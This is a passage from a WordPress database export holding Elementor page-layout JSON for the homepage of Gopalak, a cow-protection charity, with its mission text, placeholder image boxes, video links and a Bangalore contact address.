\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/abstract-background-wheat-farm-wallpaper-51701325.jpg\"}],\"background_repeat\":\"no-repeat\"},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"104\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-17\",\"bottom\":\"0\",\"left\":\"-27\",\"isLinked\":false}},\"elements\":[{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":47.722999999999999,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-1\",\"bottom\":\"0\",\"left\":\"-67\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"892627f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":3.1000000000000001,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5c704bd\",\"elType\":\"widget\",\"settings\":{\"title\":\"Values\",\"align\":\"center\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":4.2000000000000002,\"sizes\":[]},\"typography_word_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fb27b52\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In order to prevent the sinful act of killing cows or sending the cows to slaughter houses, as a small step towards protection of cows and to provide shelter for aged and unproductive cows.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"1795b3e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#154833\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":52.229999999999997,\"background_background\":\"classic\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"5\",\"isLinked\":false}},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"623a672\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":976,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"739cf25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"d837b3b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#3AB2A7\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"4b8356a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4cb627c\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"fafaf1c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#4EB4AC\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"0775f80\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5913281\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"f899190\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#2EB7BC\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"8a4dc1c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5270078\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"6ac0016\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#2EB7BC\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"9200df5\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}]},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-18,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak Values\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#FFAA00\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(9442,1607,'_elementor_page_assets','a:0:{}'),(9444,1608,'_elementor_edit_mode','builder'),(9445,1608,'_elementor_template_type','wp-page'),(9446,1608,'_elementor_version','3.7.8'),(9447,1608,'_wp_page_template','elementor_canvas'),(9448,1608,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Group-122.png\",\"id\":1543,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thaps-thumb-img\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b5a07d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"6a4419e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1356,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/abstract-background-wheat-farm-wallpaper-51701325.jpg\"}],\"background_repeat\":\"no-repeat\"},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"104\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-17\",\"bottom\":\"0\",\"left\":\"-27\",\"isLinked\":false}},\"elements\":[{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":47.722999999999999,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-1\",\"bottom\":\"0\",\"left\":\"-67\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"892627f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":3.1000000000000001,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5c704bd\",\"elType\":\"widget\",\"settings\":{\"title\":\"Values\",\"align\":\"center\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":4.2000000000000002,\"sizes\":[]},\"typography_word_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fb27b52\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In order to prevent the sinful act of killing cows or sending the cows to slaughter houses, as a small step towards protection of cows and to provide shelter for aged and unproductive cows.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"1795b3e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#154833\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":52.229999999999997,\"background_background\":\"classic\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"5\",\"isLinked\":false}},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"623a672\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":976,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"739cf25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"d837b3b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#3AB2A7\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"4b8356a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4cb627c\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"fafaf1c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#4EB4AC\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"0775f80\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click 